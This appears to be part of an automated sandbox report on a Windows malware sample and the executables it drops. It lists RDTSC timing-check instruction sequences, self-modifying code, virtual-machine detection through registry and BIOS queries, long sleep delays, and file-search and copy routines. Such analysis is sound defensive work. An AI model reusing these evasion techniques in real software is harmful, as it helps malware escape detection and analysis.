                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120A8B second address: 5120A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120AF4 second address: 5120AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120AFA second address: 5120AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120AFE second address: 5120B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FD0B548336Bh 0x00000012 add ah, FFFFFF9Eh 0x00000015 jmp 00007FD0B5483379h 0x0000001a popfd 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130DB8 second address: 5130DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130DBE second address: 5130E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FD0B5483378h 0x0000000b adc cl, 00000048h 0x0000000e jmp 00007FD0B548336Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FD0B5483376h 0x0000001f mov ebp, esp 0x00000021 jmp 00007FD0B5483370h 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD0B5483377h 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5130B56 second address: 5130B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B07FD second address: 51B0803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B0803 second address: 51B0843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Ch 0x00000009 sub ah, FFFFFFA8h 0x0000000c jmp 00007FD0B534805Bh 0x00000011 popfd 0x00000012 mov ch, 79h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 jmp 00007FD0B5348060h 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 mov esi, ebx 0x00000027 popad 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B0843 second address: 51B0860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 5Ch 0x00000005 mov dx, 4F02h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0B548336Bh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B0860 second address: 51B087D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B087D second address: 51B0883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51B0883 second address: 51B0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0A5B second address: 51A0A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0A61 second address: 51A0A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0A65 second address: 51A0A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0A69 second address: 51A0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B5348065h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0C97 second address: 51A0C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0C9B second address: 51A0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CB6 second address: 51A0CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B548336Ch 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CE2 second address: 51A0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CE8 second address: 51A0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CEC second address: 51A0CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CFB second address: 51A0CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0CFF second address: 51A0D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0D11 second address: 51A0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0D17 second address: 51A0D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0D1B second address: 51A0D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5483374h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0E9F second address: 51A0EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0EA5 second address: 51A0EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0EA9 second address: 51A0EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0EBA second address: 51A0EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51A0EC0 second address: 51A0F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov esi, 2563C333h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FD0B5348066h 0x00000018 sbb ax, 0F38h 0x0000001d jmp 00007FD0B534805Bh 0x00000022 popfd 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9CE65 second address: A9CE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9CE69 second address: A9CE73 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9CE73 second address: A9CE7D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B548336Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: A9D17F second address: A9D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 515062D second address: 515063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B548336Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 515063F second address: 51506D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD0B5348066h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edi, si 0x00000016 jmp 00007FD0B534805Ah 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push esi 0x0000001f jmp 00007FD0B534805Dh 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007FD0B5348061h 0x0000002b adc cl, 00000006h 0x0000002e jmp 00007FD0B5348061h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 jmp 00007FD0B534805Eh 0x0000003c push FFFFFFFEh 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD0B534805Ah 0x00000047 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51506D0 second address: 51506DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51506DF second address: 51506E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSpecial instruction interceptor: First address: 8EEE25 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSpecial instruction interceptor: First address: A90988 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeSpecial instruction interceptor: First address: B1D76F instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E0EE25 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FB0988 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 103D76F instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSpecial instruction interceptor: First address: FB3920 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSpecial instruction interceptor: First address: FB3A15 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSpecial instruction interceptor: First address: 114FADA instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSpecial instruction interceptor: First address: 115F9B5 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSpecial instruction interceptor: First address: 11D5544 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeCode function: 0_2_051A0DD8 rdtsc 0_2_051A0DD8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1382Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1462Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1459Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 369Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1356Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeWindow / User API: threadDelayed 2777Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeWindow / User API: foregroundWindowGot 883Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeWindow / User API: threadDelayed 909
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeWindow / User API: threadDelayed 591
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeAPI coverage: 3.3 %
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732Thread sleep count: 48 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732Thread sleep time: -96048s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736Thread sleep count: 52 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736Thread sleep time: -104052s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716Thread sleep count: 1382 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716Thread sleep time: -2765382s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728Thread sleep count: 1462 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728Thread sleep time: -2925462s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724Thread sleep count: 1459 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724Thread sleep time: -2919459s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep count: 369 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep time: -11070000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816Thread sleep time: -180000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712Thread sleep count: 1356 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712Thread sleep time: -2713356s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe TID: 5808Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492Thread sleep count: 349 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492Thread sleep count: 909 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492Thread sleep count: 591 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe TID: 3176Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684Thread sleep count: 134 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684Thread sleep count: 341 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684Thread sleep count: 221 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeThread sleep count: Count: 2777 delay: -10Jump to behavior
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00B8DBBE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B968EE FindFirstFileW,FindClose,6_2_00B968EE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00B9698F
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00B8D076
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00B8D3A9
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00B99642
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00B9979D
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00B99B2B
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B95C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00B95C97
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B938B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,20_2_00B938B0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,20_2_00B8E430
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,20_2_00B8ED20
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B94910
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B94570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,20_2_00B94570
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B8F6B0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,20_2_00B93EA0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,20_2_00B8DA80
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B816D0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B8DE10
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,20_2_00B8BE70
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00B242DE
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                                Source: 9d7da53f74.exe, 9d7da53f74.exe, 0000003C.00000002.2745204557.0000000001130000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
